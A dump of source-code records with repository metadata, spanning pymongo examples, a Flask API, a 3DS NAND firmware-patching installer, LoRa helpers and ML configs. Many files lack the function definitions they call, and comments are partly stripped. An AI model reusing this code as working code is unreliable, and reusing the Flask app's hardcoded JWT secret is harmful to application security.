hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4654a308feea7ad07bf6af611b62104666bd4e8d | 5,087 | py | Python | shfl/data_distribution/data_distribution_non_iid.py | SSSuperTIan/Sherpa.ai-Federated-Learning-Framework | a30d73a018526f1033ee0ec57489c4c6e2f15b0a | [
"Apache-2.0"
] | 1 | 2021-03-18T07:31:36.000Z | 2021-03-18T07:31:36.000Z | shfl/data_distribution/data_distribution_non_iid.py | SSSuperTIan/Sherpa.ai-Federated-Learning-Framework | a30d73a018526f1033ee0ec57489c4c6e2f15b0a | [
"Apache-2.0"
] | null | null | null | shfl/data_distribution/data_distribution_non_iid.py | SSSuperTIan/Sherpa.ai-Federated-Learning-Framework | a30d73a018526f1033ee0ec57489c4c6e2f15b0a | [
"Apache-2.0"
] | null | null | null | import numpy as np
import random
import tensorflow as tf
from shfl.data_base.data_base import shuffle_rows
from shfl.data_distribution.data_distribution_sampling import SamplingDataDistribution
| 36.597122 | 113 | 0.612149 |
4656ff804d82461f52d5fb2b608b15a88f9feeb7 | 1,298 | py | Python | example/0_Basic_usage_of_the_library/python_pymongo/2_select.py | AndersonHJB/learning_spider | b855b7808fb5268e9564180cf73ba5b1fb133f58 | [
"MIT"
] | 2 | 2021-09-07T13:28:34.000Z | 2021-12-13T06:17:10.000Z | example/0_Basic_usage_of_the_library/python_pymongo/2_select.py | AndersonHJB/learning_spider | b855b7808fb5268e9564180cf73ba5b1fb133f58 | [
"MIT"
] | null | null | null | example/0_Basic_usage_of_the_library/python_pymongo/2_select.py | AndersonHJB/learning_spider | b855b7808fb5268e9564180cf73ba5b1fb133f58 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
'''
@Time : 2021-06-08
@Author : EvilRecluse
@Contact : https://github.com/RecluseXU
@Desc :
'''
# here put the import lib
from pymongo import MongoClient
from bson import ObjectId
connection: MongoClient = MongoClient('mongodb://localhost:27017')
collection = connection['local']['startup_log']
#
# find: find find_one
# collection.find
# collection.find_one
# mongo pymongo
# mongo pymongo
# filter
# . SQLWHERE
#
_filter = {'pid': 4444} # pid4444
result = collection.find_one(_filter)
print(result)
# projection
#
# 1
# 0, 0
# _id s
projection = {'_pid': 1, 'hostname': 1}
result = collection.find_one(_filter, projection)
print(result)
collection.find_one({'_id': ObjectId('EvilMass-1619315049192')}) # _id
# skip
#
result = collection.find(_filter, projection, skip=1)
print(list(result))
# limit
#
result = collection.find(_filter, projection, limit=2)
print(list(result))
# collection.count_documents
#
result = collection.count_documents({'_pid': 4444})
print(result)
| 22 | 80 | 0.743451 |
4657a986bf5b4eb76c1f27d0639731c4204bb162 | 4,428 | py | Python | install-b9s.py | ihaveamac/hardmod-b9s-installer | 4b26cfff76bb00430aacbe80679623e3cc5bb46d | [
"MIT"
] | 13 | 2017-05-20T03:54:55.000Z | 2021-10-09T22:10:09.000Z | install-b9s.py | ihaveamac/hardmod-b9s-installer | 4b26cfff76bb00430aacbe80679623e3cc5bb46d | [
"MIT"
] | 2 | 2017-06-09T06:40:20.000Z | 2017-09-17T14:29:28.000Z | install-b9s.py | ihaveamac/hardmod-b9s-installer | 4b26cfff76bb00430aacbe80679623e3cc5bb46d | [
"MIT"
] | 3 | 2017-12-24T19:10:09.000Z | 2020-12-04T09:01:53.000Z | #!/usr/bin/env python3
import hashlib
import os
import shutil
import subprocess
import sys
import time
if not os.path.isfile('NAND.bin'):
doexit('NAND.bin not found.', errcode=1)
if os.path.isfile('firm0firm1.bak'):
doexit('firm0firm1.bak was found.\n'
'In order to prevent writing a good backup with a bad one, the '
'install has stopped. Please move or delete the old file if you '
'are sure you want to continue. If you would like to restore, use '
'`restore-firm0firm1`.',
errcode=1)
if os.path.isfile('NAND-patched.bin'):
doexit('NAND-patched.bin was found.\n'
'Please move or delete the patched NAND before patching another.',
errcode=1)
if not os.path.isfile('current.firm'):
doexit('current.firm not found.', errcode=1)
if not os.path.isfile('boot9strap.firm'):
doexit('boot9strap.firm not found.', errcode=1)
if not os.path.isfile('boot9strap.firm.sha'):
doexit('boot9strap.firm.sha not found.', errcode=1)
print('Verifying boot9strap.firm.')
with open('boot9strap.firm.sha', 'rb') as f:
b9s_hash = f.read(0x20)
with open('boot9strap.firm', 'rb') as f:
if hashlib.sha256(f.read(0x400000)).digest() != b9s_hash:
doexit('boot9strap.firm hash check failed.', errcode=1)
print('boot9strap.firm hash check passed.')
readsize = 0x100000 # must be divisible by 0x3AF00000 and 0x4D800000
shutil.rmtree('work', ignore_errors=True)
os.makedirs('work', exist_ok=True)
overall_time = time.time()
print('Trying to open NAND.bin...')
with open('NAND.bin', 'rb+') as nand:
print('Backing up FIRM0FIRM1 to firm0firm1.bin...')
nand.seek(0xB130000)
start_time = time.time()
with open('firm0firm1.bak', 'wb') as f:
for curr in range(0x800000 // readsize):
f.write(nand.read(readsize))
print('Reading {:06X} ({:>5.1f}%)'.format((curr + 1) * readsize,
(((curr + 1) * readsize) / 0x800000) * 100), end='\r')
print('\nReading finished in {:>.2f} seconds.\n'.format(
time.time() - start_time))
print('Creating FIRMs to xor from boot9strap.firm.')
start_time = time.time()
with open('current.firm', 'rb') as f:
with open('work/current_pad.bin', 'wb') as b9s:
b9s.write(f.read(0x400000).ljust(0x400000, b'\0') * 2)
with open('boot9strap.firm', 'rb') as f:
with open('work/boot9strap_pad.bin', 'wb') as b9s:
b9s.write(f.read(0x400000).ljust(0x400000, b'\0') * 2)
print('Creation finished in {:>.2f} seconds.\n'.format(
time.time() - start_time))
print('XORing FIRM0FIRM1 with current.firm.')
start_time = time.time()
runcommand(['tools/lazyxor-' + sys.platform, 'firm0firm1.bak',
'work/current_pad.bin', 'work/xored.bin'])
print('XORing finished in {:>.2f} seconds.\n'.format(
time.time() - start_time))
print('XORing FIRM0FIRM1 with boot9strap.firm.')
start_time = time.time()
runcommand(['tools/lazyxor-' + sys.platform, 'work/xored.bin',
'work/boot9strap_pad.bin', 'work/final.bin'])
print('XORing finished in {:>.2f} seconds.\n'.format(
time.time() - start_time))
print('Writing final FIRMs to NAND.bin.')
with open('work/final.bin', 'rb') as f:
firm_final = f.read(0x800000)
nand.seek(0xB130000)
start_time = time.time()
for curr in range(0x800000 // readsize):
print('Writing {:06X} ({:>5.1f}%)'.format((curr + 1) * readsize,
(((curr + 1) * readsize) / 0x800000) * 100), end='\r')
nand.write(bytes(firm_final[curr * readsize:(curr + 1) * readsize]))
print('\nWriting finished in {:>.2f} seconds.'.format(
time.time() - start_time))
os.rename('NAND.bin', 'NAND-patched.bin')
doexit('boot9strap install process finished in {:>.2f} seconds.'.format(
time.time() - overall_time))
| 35.709677 | 78 | 0.626016 |
46586eef963ebf4f9bbb1677b780f95787d3e23e | 6,329 | py | Python | pygazebo/connection.py | robobe/pygazebo | 0ab53034c9cc5bf23bae46bf0e9c984349bdfa5a | [
"Apache-2.0"
] | null | null | null | pygazebo/connection.py | robobe/pygazebo | 0ab53034c9cc5bf23bae46bf0e9c984349bdfa5a | [
"Apache-2.0"
] | null | null | null | pygazebo/connection.py | robobe/pygazebo | 0ab53034c9cc5bf23bae46bf0e9c984349bdfa5a | [
"Apache-2.0"
] | 1 | 2020-12-09T17:27:34.000Z | 2020-12-09T17:27:34.000Z | import concurrent
import time
import math
import sys
import asyncio
import logging
from . import msg
from .parse_error import ParseError
from . import DEBUG_LEVEL
logger = logging.getLogger(__name__)
logger.setLevel(DEBUG_LEVEL)
| 32.623711 | 137 | 0.613367 |
4658a352b7ba7209186ef3d47f169f46b8660613 | 2,182 | py | Python | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | src/visualization/visualize_dataset.py | ivangarrera/MachineLearning | c13584cdcb7c4df1ab2814cf42a3c2bd3c203e75 | [
"MIT"
] | null | null | null | from common_clustering import CommonClustering
#clustering_features = CommonClustering(r'C:\Users\ivangarrera\Desktop\T2_cleaned.csv')
clustering_features = CommonClustering('D:\Ing. Informatica\Cuarto\Machine Learning\T2_cleaned_gyroscope.csv')
attr = list(clustering_features.data_set)[0][:list(clustering_features.data_set)[0].find('_')]
clustering_features.attr = attr
clustering_features.PrincipalComponentAnalysis(num_components=2)
# Get the number of clusters that provides the best results
ideal_number_of_clusters = clustering_features.getBestNumberOfClusters()
# Plot silhuettes array
clustering_features.PlotSilhouettes()
# Print k-means with the best number of clusters that have been found
labels = clustering_features.KMeansWithIdeal(ideal_number_of_clusters)
# Interprate k-means groups
clustering_features.data_set['labels'] = labels
data_set_labels_mean = clustering_features.data_set.groupby(['labels']).mean()
# Plot 3D graph to interpretate k-means groups
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = Axes3D(fig)
ax.scatter(data_set_labels_mean.values[:,0],
data_set_labels_mean.values[:,1],
data_set_labels_mean.values[:,2])
plt.savefig(r'../../reports/figures/centroids3D_{}.png'.format(attr))
plt.show()
# Agglomerative clustering algorithm using nearest neighbors matrix
clustering_features.AgglomerativeClusteringWithNearestNeighbors()
# DBSCAN Clustering algorithm
labels = clustering_features.DBSCANClustering()
# Interprate outliers
clustering_features.data_set['labels'] = labels
data_set_outliers = clustering_features.data_set.loc[(clustering_features.data_set['labels'] == -1)]
# Show outliers in a 3D graph with all points in the dataset
fig = plt.figure()
ax = Axes3D(fig)
ax.scatter(clustering_features.data_set.values[:,0],
clustering_features.data_set.values[:,1],
clustering_features.data_set.values[:,2])
ax.scatter(data_set_outliers.values[:,0],
data_set_outliers.values[:,1],
data_set_outliers.values[:,2], c='red', s=50)
plt.savefig(r'../../reports/figures/outliers3D_{}.png'.format(attr))
plt.show()
| 36.983051 | 110 | 0.779102 |
465a22b29f2bfae5b6e8e5e3348394868002ce0f | 1,483 | py | Python | app.py | Geo-Gabriel/REST-Api-Hotels | e065f4725507e11a11480118f326e79aded533d5 | [
"MIT"
] | null | null | null | app.py | Geo-Gabriel/REST-Api-Hotels | e065f4725507e11a11480118f326e79aded533d5 | [
"MIT"
] | null | null | null | app.py | Geo-Gabriel/REST-Api-Hotels | e065f4725507e11a11480118f326e79aded533d5 | [
"MIT"
] | null | null | null | from blacklist import BLACKLIST
from flask import Flask, jsonify
from flask_restful import Api
from resources.hotel import Hoteis, Hotel
from resources.user import User, UserLogin, UserLogout, UserRegister, Users
from resources.site import Site, Sites
from flask_jwt_extended import JWTManager
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['JWT_SECRET_KEY'] = 'Jbs8aGbbAyt7iMa878Pnsj'
app.config['JWT_BLACKLIST_ENABLED'] = True
api = Api(app)
jwt = JWTManager(app)
# Hotels resource
api.add_resource(Hoteis, '/hoteis')
api.add_resource(Hotel, '/hoteis/<string:hotel_id>')
# Users resource
api.add_resource(Users, '/users')
api.add_resource(User, '/users/<string:user_id>')
# User register resource
api.add_resource(UserRegister, '/register')
# Login resource
api.add_resource(UserLogin, '/login')
# Logout resource
api.add_resource(UserLogout, '/logout')
# Sites resource
api.add_resource(Sites, '/sites')
api.add_resource(Site, '/sites/<string:site_url>')
if __name__ == '__main__':
from database.sql_alchemy import db
db.init_app(app)
app.run(debug=True)
| 26.017544 | 80 | 0.766689 |
465a6321a407b2ead52a83060d6a413f0b6c0e5a | 316 | py | Python | scdlbot/__init__.py | samillinier/habesha-skin-pack | 74d1c84b207c8d598f124a91dce11fb09109c772 | [
"MIT"
] | null | null | null | scdlbot/__init__.py | samillinier/habesha-skin-pack | 74d1c84b207c8d598f124a91dce11fb09109c772 | [
"MIT"
] | null | null | null | scdlbot/__init__.py | samillinier/habesha-skin-pack | 74d1c84b207c8d598f124a91dce11fb09109c772 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Top-level package for Music Downloader Telegram Bot."""
# version as tuple for simple comparisons
VERSION = (0, 9, 16)
__author__ = """George Pchelkin"""
__email__ = 'george@pchelk.in'
# string created from tuple to avoid inconsistency
__version__ = ".".join([str(x) for x in VERSION])
| 26.333333 | 58 | 0.696203 |
465afd4dc993d8e9672e85b05bdf2dd73ac767b6 | 4,355 | py | Python | uPython/lopyhelper.py | somervda/ourLora | 8ee21a3eefd13464ad5063174a7a7cab57229e0d | [
"MIT"
] | null | null | null | uPython/lopyhelper.py | somervda/ourLora | 8ee21a3eefd13464ad5063174a7a7cab57229e0d | [
"MIT"
] | 3 | 2022-02-14T19:32:32.000Z | 2022-02-24T18:22:28.000Z | uPython/lopyhelper.py | somervda/ourLora | 8ee21a3eefd13464ad5063174a7a7cab57229e0d | [
"MIT"
] | null | null | null | import struct
import pycom
import time
from network import LoRa
def setUSFrequencyPlan(lora):
""" Sets the frequency plan that matches the TTN gateway in the USA """
# remove all US915 channels
for channel in range(0, 72):
lora.remove_channel(channel)
# set all channels to the same frequency (must be before sending the OTAA join request)
ttn_start_frequency = 903900000
ttn_step_frequency = 200000
ttn_ch8_frequency = 904600000
# Set up first 8 US915 TTN uplink channels
for channel in range(0, 9):
if (channel == 8):
channel_frequency = ttn_ch8_frequency
# DR3 = SF8/500kHz
channel_dr_min = 4
channel_dr_max = 4
else:
channel_frequency = ttn_start_frequency + \
(channel * ttn_step_frequency)
# DR0 = SF10/125kHz
channel_dr_min = 0
# DR3 = SF7/125kHz
channel_dr_max = 3
lora.add_channel(channel, frequency=channel_frequency,
dr_min=channel_dr_min, dr_max=channel_dr_max)
print("Added channel", channel, channel_frequency,
channel_dr_min, channel_dr_max)
def join(app_eui, app_key, useADR):
""" Join the Lorawan network using OTAA. new lora session is returned """
# Set the power to 20db for US915
# You can also set the default dr value but I found that was problematic
# You need to turn on adr (auto data rate) at this point if it is to be used
# only use adr for static devices (Not moving)
# see https://lora-developers.semtech.com/library/tech-papers-and-guides/understanding-adr/
lora = LoRa(mode=LoRa.LORAWAN, region=LoRa.US915,
adr=useADR, tx_power=20)
setUSFrequencyPlan(lora)
print('Joining', end='')
lora.join(activation=LoRa.OTAA, auth=(app_eui, app_key), timeout=0)
# wait until the module has joined the network
while not lora.has_joined():
time.sleep(2.5)
blink(.5, 0xff8f00) # dark orange
print('.', end='')
print('')
print('Joined')
blink(2, 0x006400) # dark green
return lora
def send(lora, socket, port, payload, useADR):
""" send data to the lorawan gateway on selected port """
blink(.5, 0x00008b) # dark blue
socket.setblocking(True)
socket.bind(port)
print("Sending data:", payload.pack(), " Size:", payload.calcsize())
socket.send(payload.pack())
# Give send a extra second to be returned before switching
# the socket blocking mode (May not need this)
time.sleep(1)
socket.setblocking(False)
lora.nvram_save()
| 35.406504 | 105 | 0.665901 |
465b3dc1f585b6b0356f07d08239e727188800e8 | 2,980 | py | Python | configs/efficientnet/retinanet_effb3_fpn_crop896_8x4_1x_coco.py | chenxinfeng4/mmdetection | a99a1aaa5e4a7614f2f89f2350e1b917b2a8ca7e | [
"Apache-2.0"
] | 6 | 2021-12-18T07:23:35.000Z | 2022-02-26T04:38:26.000Z | configs/efficientnet/retinanet_effb3_fpn_crop896_8x4_1x_coco.py | wondervictor/mmdetection | c72bc707e661d61cf09aca0a53ad21812ef874d0 | [
"Apache-2.0"
] | null | null | null | configs/efficientnet/retinanet_effb3_fpn_crop896_8x4_1x_coco.py | wondervictor/mmdetection | c72bc707e661d61cf09aca0a53ad21812ef874d0 | [
"Apache-2.0"
] | 1 | 2021-12-12T13:35:22.000Z | 2021-12-12T13:35:22.000Z | _base_ = [
'../_base_/models/retinanet_r50_fpn.py',
'../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
]
cudnn_benchmark = True
norm_cfg = dict(type='BN', requires_grad=True)
checkpoint = 'https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b3_3rdparty_8xb32-aa_in1k_20220119-5b4887a0.pth' # noqa
model = dict(
backbone=dict(
_delete_=True,
type='EfficientNet',
arch='b3',
drop_path_rate=0.2,
out_indices=(3, 4, 5),
frozen_stages=0,
norm_cfg=dict(
type='SyncBN', requires_grad=True, eps=1e-3, momentum=0.01),
norm_eval=False,
init_cfg=dict(
type='Pretrained', prefix='backbone', checkpoint=checkpoint)),
neck=dict(
in_channels=[48, 136, 384],
start_level=0,
out_channels=256,
relu_before_extra_convs=True,
no_norm_on_lateral=True,
norm_cfg=norm_cfg),
bbox_head=dict(type='RetinaSepBNHead', num_ins=5, norm_cfg=norm_cfg),
# training and testing settings
train_cfg=dict(assigner=dict(neg_iou_thr=0.5)))
# dataset settings
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
img_size = (896, 896)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=img_size,
ratio_range=(0.8, 1.2),
keep_ratio=True),
dict(type='RandomCrop', crop_size=img_size),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size=img_size),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=img_size,
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size=img_size),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(pipeline=train_pipeline),
val=dict(pipeline=test_pipeline),
test=dict(pipeline=test_pipeline))
# optimizer
optimizer_config = dict(grad_clip=None)
optimizer = dict(
type='SGD',
lr=0.04,
momentum=0.9,
weight_decay=0.0001,
paramwise_cfg=dict(norm_decay_mult=0, bypass_duplicate=True))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=1000,
warmup_ratio=0.1,
step=[8, 11])
# runtime settings
runner = dict(type='EpochBasedRunner', max_epochs=12)
# NOTE: This variable is for automatically scaling LR,
# USER SHOULD NOT CHANGE THIS VALUE.
default_batch_size = 32 # (8 GPUs) x (4 samples per GPU)
| 31.702128 | 147 | 0.645638 |
465d72bc64541d0735329d0bb15e70e1a6c30e99 | 2,265 | py | Python | tests/test_model.py | Sebastiencreoff/mongo_tool | 048171ba2c172c0e8962a5408edbaec26cfdf4ca | [
"MIT"
] | null | null | null | tests/test_model.py | Sebastiencreoff/mongo_tool | 048171ba2c172c0e8962a5408edbaec26cfdf4ca | [
"MIT"
] | null | null | null | tests/test_model.py | Sebastiencreoff/mongo_tool | 048171ba2c172c0e8962a5408edbaec26cfdf4ca | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import datetime
import mock
import mom
| 25.449438 | 74 | 0.63532 |
46604f1fc90b7c0ea8ac8ed35c4082c5ab9f172f | 247 | py | Python | src/koeda/utils/stopwords.py | toriving/KoEDA | 5dfbb0e88ede13da2e5e72ac94fe7cb12c0b7cd1 | [
"MIT"
] | 48 | 2021-04-23T16:13:41.000Z | 2022-03-24T09:03:26.000Z | src/koeda/utils/stopwords.py | toriving/KoEDA | 5dfbb0e88ede13da2e5e72ac94fe7cb12c0b7cd1 | [
"MIT"
] | 6 | 2020-11-19T13:56:29.000Z | 2021-09-26T12:13:23.000Z | src/koeda/utils/stopwords.py | toriving/KoEDA | 5dfbb0e88ede13da2e5e72ac94fe7cb12c0b7cd1 | [
"MIT"
] | 3 | 2021-09-13T07:14:29.000Z | 2021-12-29T09:52:36.000Z | import os
import json
STOPWORDS_JSON_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.pardir, "corpora/stopwords.json"
)
with open(STOPWORDS_JSON_PATH, "r", encoding="utf-8") as f:
STOPWORD = json.load(f)["stopwords"]
| 24.7 | 83 | 0.720648 |
4660b825bf1a5e031627c3620c78b68944deb5c7 | 652 | py | Python | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | 3 | 2015-09-10T22:23:55.000Z | 2019-04-04T18:47:33.000Z | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | null | null | null | glue/core/tests/test_message.py | ejeschke/glue | 21689e3474aeaeb70e258d76c60755596856976c | [
"BSD-3-Clause"
] | 1 | 2019-08-04T14:10:12.000Z | 2019-08-04T14:10:12.000Z | from __future__ import absolute_import, division, print_function
import pytest
from .. import message as msg
| 27.166667 | 74 | 0.739264 |
4660df17d48e40efbff3c55617fa7393819b5977 | 1,358 | py | Python | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | 1 | 2017-07-30T17:35:10.000Z | 2017-07-30T17:35:10.000Z | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | null | null | null | fabfile/config.py | kurochan/config-collector | 656da97eb219eb5bcf913173dd7aa76d0cedd44c | [
"MIT"
] | 1 | 2015-03-01T08:52:14.000Z | 2015-03-01T08:52:14.000Z | # -*- coding: utf-8 -*-
import os
import util
from fabric.api import *
from fabric.state import output
from fabric.colors import *
from base import BaseTask
from helper.print_helper import task_puts
collect = CollectConfig()
| 33.121951 | 156 | 0.690722 |
4661333ffeca10b7026c68a47b44fc3be83ff093 | 2,334 | py | Python | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | LWhite027/PaddleBox | b14bcdf285dd8829e11ab12cc815ac1b1ab62694 | [
"Apache-2.0"
] | 10 | 2021-05-12T07:20:32.000Z | 2022-03-04T08:21:56.000Z | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 1 | 2020-09-10T09:05:52.000Z | 2020-09-10T09:06:22.000Z | python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 25 | 2019-12-07T02:14:14.000Z | 2021-12-30T06:16:30.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from inference_pass_test import InferencePassTest
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.core import AnalysisConfig
if __name__ == "__main__":
unittest.main()
| 40.947368 | 83 | 0.673522 |
46627a350df5177a8548cf67ff0c02d30e501fb7 | 2,183 | py | Python | src/stage_02_base_model_creation.py | TUCchkul/Dog-Cat-Classification-with-MLflow | 543f55bd88c048da88f343ff4b1b15b3f84ec20f | [
"MIT"
] | null | null | null | src/stage_02_base_model_creation.py | TUCchkul/Dog-Cat-Classification-with-MLflow | 543f55bd88c048da88f343ff4b1b15b3f84ec20f | [
"MIT"
] | null | null | null | src/stage_02_base_model_creation.py | TUCchkul/Dog-Cat-Classification-with-MLflow | 543f55bd88c048da88f343ff4b1b15b3f84ec20f | [
"MIT"
] | null | null | null | import argparse
import os
import shutil
from tqdm import tqdm
import logging
from src.utils.common import read_yaml, create_directories
import random
from src.utils.model import log_model_summary
import tensorflow as tf
STAGE= "Base Model Creation"
logging.basicConfig(
filename=os.path.join("logs",'running_logs.log'),
level=logging.INFO,
format="[%(asctime)s: %(levelname)s: %(module)s]: %(message)s",
filemode="a")
if __name__=="__main__":
args=argparse.ArgumentParser()
args.add_argument("--config", "-c", default="configs/config.yaml")
parsed_args=args.parse_args()
try:
logging.info("\n*********************")
logging.info(f">>>>>>>stage {STAGE} started <<<<<<<")
main(config_path=parsed_args.config)
logging.info(f">>>>>>>> stage {STAGE} completed! <<<<<<<<\n")
except Exception as e:
logging.exception(e)
raise e
| 33.584615 | 81 | 0.633532 |
46628dc5cc0651a6487fc8978ac7257bc4e97455 | 3,774 | py | Python | test_calculator.py | Kidatoy/Advanced-Calculator | ebd3e436894116ec35b08872ffecdf762b079670 | [
"MIT"
] | null | null | null | test_calculator.py | Kidatoy/Advanced-Calculator | ebd3e436894116ec35b08872ffecdf762b079670 | [
"MIT"
] | null | null | null | test_calculator.py | Kidatoy/Advanced-Calculator | ebd3e436894116ec35b08872ffecdf762b079670 | [
"MIT"
] | null | null | null | import unittest # https://docs.python.org/3/library/unittest.html
from modules.calculator import Calculator as Calc
| 36.640777 | 75 | 0.560943 |
4662eb3534b543f9d1857e55e3d0e8669cf078e7 | 9,315 | py | Python | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | null | null | null | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | 4 | 2020-04-17T06:53:05.000Z | 2020-12-01T02:37:34.000Z | pddf_psuutil/main.py | deran1980/sonic-utilities | a6ae218238e7e552f49191f81451bd55ff56ba51 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# main.py
#
# Command-line utility for interacting with PSU Controller in PDDF mode in SONiC
#
try:
import sys
import os
import click
from tabulate import tabulate
from utilities_common.util_base import UtilHelper
except ImportError as e:
raise ImportError("%s - required module not found" % str(e))
VERSION = '2.0'
SYSLOG_IDENTIFIER = "psuutil"
PLATFORM_SPECIFIC_MODULE_NAME = "psuutil"
PLATFORM_SPECIFIC_CLASS_NAME = "PsuUtil"
# Global platform-specific psuutil class instance
platform_psuutil = None
platform_chassis = None
# Wrapper APIs so that this util is suited to both 1.0 and 2.0 platform APIs
# ==================== CLI commands and groups ====================
# This is our main entrypoint - the main 'psuutil' command
# 'version' subcommand
# 'numpsus' subcommand
# 'status' subcommand
# 'mfrinfo' subcommand
# 'seninfo' subcommand
if __name__ == '__main__':
cli()
| 31.05 | 117 | 0.646914 |
466394d9212459110bd5519845967eacdfeb9888 | 758 | py | Python | gifbox/core/serializers.py | timmygee/gifbox | ccdd88ad9424c8e2c519415cde619af3a61daf66 | [
"MIT"
] | null | null | null | gifbox/core/serializers.py | timmygee/gifbox | ccdd88ad9424c8e2c519415cde619af3a61daf66 | [
"MIT"
] | null | null | null | gifbox/core/serializers.py | timmygee/gifbox | ccdd88ad9424c8e2c519415cde619af3a61daf66 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from versatileimagefield.serializers import VersatileImageFieldSerializer
from .models import Image, AnimatedGif
| 23.6875 | 73 | 0.631926 |
466460f359120dda2e7fd00e3c8bae00cdec4a39 | 4,930 | py | Python | ginga/canvas/coordmap.py | saimn/ginga | 9daf1875b4c1b0fad0a053c5f258bf7d4c0f3455 | [
"BSD-3-Clause"
] | null | null | null | ginga/canvas/coordmap.py | saimn/ginga | 9daf1875b4c1b0fad0a053c5f258bf7d4c0f3455 | [
"BSD-3-Clause"
] | null | null | null | ginga/canvas/coordmap.py | saimn/ginga | 9daf1875b4c1b0fad0a053c5f258bf7d4c0f3455 | [
"BSD-3-Clause"
] | null | null | null | #
# coordmap.py -- coordinate mappings.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga import trcalc
from ginga.util import wcs
from ginga.util.six.moves import map
__all__ = ['CanvasMapper', 'DataMapper', 'OffsetMapper', 'WCSMapper']
#END
| 30.245399 | 71 | 0.631034 |
46656e54aaab662adced0d0bfa04fce707df2e88 | 6,658 | py | Python | train.py | zpc-666/Paddle-Stochastic-Depth-ResNet110 | bb8b5b90052feef39fafd2a790f08b80b45fbe41 | [
"Apache-2.0"
] | null | null | null | train.py | zpc-666/Paddle-Stochastic-Depth-ResNet110 | bb8b5b90052feef39fafd2a790f08b80b45fbe41 | [
"Apache-2.0"
